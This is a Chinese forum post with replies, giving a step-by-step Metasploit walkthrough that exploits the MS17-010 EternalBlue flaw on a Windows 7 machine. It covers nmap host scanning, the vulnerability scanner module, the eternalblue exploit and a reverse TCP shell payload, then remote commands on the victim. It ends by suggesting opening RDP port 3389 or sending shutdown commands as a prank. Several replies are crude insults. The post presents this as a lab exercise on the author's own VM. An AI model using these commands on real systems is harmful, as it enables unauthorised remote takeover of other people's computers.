请选择 进入手机版 | 继续访问电脑版
 找回密码
 立即注册
搜索

【实战】实战利用MS17-010永恒之蓝漏洞渗透Win7系统

324 6
2021-11-25 11:41:04
显示全部楼层
0x01

首先我们需要和目标在同一网段下

Windows查看本机IP方法:

Win+R输入cmd,回车后会打开cmd命令框输入ipconfig(这个命令人人皆知)


发现目标的ip是192.168.33.0这个网段下

接着打开Kali Linux

在终端输入ifconfig这个命令查看自己的ip


发现是同一网段下

我们现在做的是白盒测试,知道目标机器的IP

如果在未知目标IP的情况下,需要用到Nmap这个工具

扫描存活主机:

  1. nmap -sS -O 192.168.33.0/24
复制代码

我们这里就不浪费时间做演示了



在kali终端输入

  1. msfdb run
复制代码
出现此页面就说明启动成功
现在我们需要验证目标是否有漏洞

  1. search ms17-010
复制代码
使用图中的


  1. use auxiliary/scanner/smb/smb_ms17_010
复制代码


查看选项是否补齐

  1. show options
复制代码


发现RHOSTS这个选项没有补齐

(rhosts是目标主机)

  1. set rhosts 192.168.33.232
复制代码
然后输入run


Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

目标看起来易受到攻击,Windows7版本


绿色的框子是手敲命令行

红色的是我们要使用的exploit

黄色的是提示:没有payload
  1. 重新搜索:search ms17-010
复制代码
  1. 使用exploit:use exploit/windows/smb/ms17_010_eternalblue
复制代码
完成后,需要选择你的目标系统
  1. show targets
复制代码
找到Windows7对应的编号,这边显示编号为1
然后在下面设置目标编号
  1. set target 1
复制代码
接下来我们需要寻找一个payload来稳定我们与目标之间的连接
否则非常容易断开连接
payload:载荷攻击
  1. search windows/x64/shell type:payload
复制代码
  1. set payload windows/x64/shell/reverse_tcp
复制代码
选择好payload之后,查看一下选项是否补齐
未补齐,直接输入命令补齐
  1. show options
复制代码
  1. set rhosts 192.168.33.232
复制代码
rhosts:目标主机
lhost:你的主机


最振奋人心的一步来了
exploit利用漏洞
  1. exploit
复制代码
稍等片刻,即可弹出shell
如果长时间没反应,可以手动输入shell
有可能会出现乱码
这是因为Windows和Linux的编码不一样导致的
可以自行设置
在shell里面输入创建文件夹命令,指定桌面路径
  1. md C:\Users\Administrator\Desktop
  2. md就是mkdir的缩写
复制代码
现在打开虚拟机
发现已经多出来一个文件夹了
更多命令要你们自己来摸索
给个思路:用shell开启3389端口,再远程链接桌面
或者使用关机&重启的命令恶搞

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
2021-11-25 16:31:42
显示全部楼层
永恒之蓝漏洞只能黑没有防火墙和杀毒的电脑,漏洞本身比较古老。但是永恒之蓝是一个特别经典的漏洞,值得小白去了解学习
回复

使用道具 举报

2021-12-19 09:09:19
显示全部楼层
好好好  棒棒棒
回复

使用道具 举报

2021-12-19 18:07:19
显示全部楼层
莲芬 发表于 2021-12-19 09:09
好好好  棒棒棒

好你mb
回复

使用道具 举报

2021-12-20 15:02:31
显示全部楼层
回复

使用道具 举报

2021-12-21 08:51:35
显示全部楼层

艹你蔴,崽种
回复

使用道具 举报

2022-2-22 16:13:28
显示全部楼层
:):):)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册